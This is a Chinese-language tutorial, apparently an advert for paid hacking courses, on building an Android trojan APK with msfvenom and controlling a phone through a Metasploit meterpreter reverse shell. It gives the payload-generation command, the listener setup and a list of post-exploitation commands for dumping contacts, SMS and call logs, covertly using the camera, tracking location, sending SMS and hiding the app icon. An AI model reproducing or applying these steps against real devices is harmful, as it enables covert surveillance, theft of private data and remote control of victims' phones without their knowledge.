使用Kali的metasploit生成安卓APK木馬控制安卓手機
前提:在虛擬機里面安裝kali系統,再就是本機安裝一個夜神模擬器,和一個安卓5的環境
如果不會的話,可以報名跟我們學習,聯系方式hk007.cn
第一步:在終端輸入ip addr命令查看kali主機的IP地址
ip addr
我的kali主機IP地址為192.168.2.146 每個人的不一樣,靈活運用
第二步,輸入生成反彈木馬命令:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/yxs.apk
注意了,命令ip地址必須跟你自己的kali主機IP地址保持一致
然后在kali系統的根路徑的home文件夾下面會出現一個apk文件,把虛擬機kali系統
里面的這個apk文件復制到本機,然后拖到夜神模擬器里面安裝並且運行。
第三步:啟動msfconsole,配置相關參數
msfconsole //啟動msfconsole use exploit/multi/handler //加載模塊 set payload android/meterpreter/reverse_tcp //選擇Payload set lhost 192.168.2.146 //這里的地址設置成我們剛才生成木馬的IP地址 set lport 55555 exploit //開始執行漏洞 開始監聽,等待手機上線
第四步:點一下夜神模擬器上面的MainActivity程序(即安卓遠控木馬),我們
會在kali里面發現有主機上線了。
第五步:使用各種命令開始操控手機,那我們都可以做些什么呢?
5.1查看手機信息
sysinfo
5.2查看手機有多少個攝像頭
webcam_list
5.3開啟攝像頭
webcam_stream
然后在kali系統中打開這個html文件,即可在線實時監控攝像頭畫面
5.4導出電話號碼
dump_contacts
5.5導出短信信息
dump_sms
5.6通過攝像頭拍照功能
webcam_snap
5.X其他命令大全
send_sms //從目標會話發送短消息
webcam_snap //隱秘拍照功能
webcam_snap //從指定的攝像頭獲取快照
check_root //檢查設備是否有根
hide_app_icon //隱藏手機端木馬程序圖標
dump_calllog //獲取通話記錄
geolocate //獲取手機的當前的經緯度
set_audio_mode //Set Ringer Mode
sqlite_query //Query a SQLite database from storage
wakelock // Enable/Disable Wakelock
wlan_geolocate // Get current lat-long using WLAN information
app_install // Request to install apk file
app_list // List installed apps in the device
app_run // Start Main Activty for package name
app_uninstall //Request to uninstall application
后記:如果還是學不懂,可以報名參加培訓班,聯系方式hk007.cn
這一節只是最簡單的用法,還有更高級的frp穿透,開機自啟,安卓免殺等內容教學。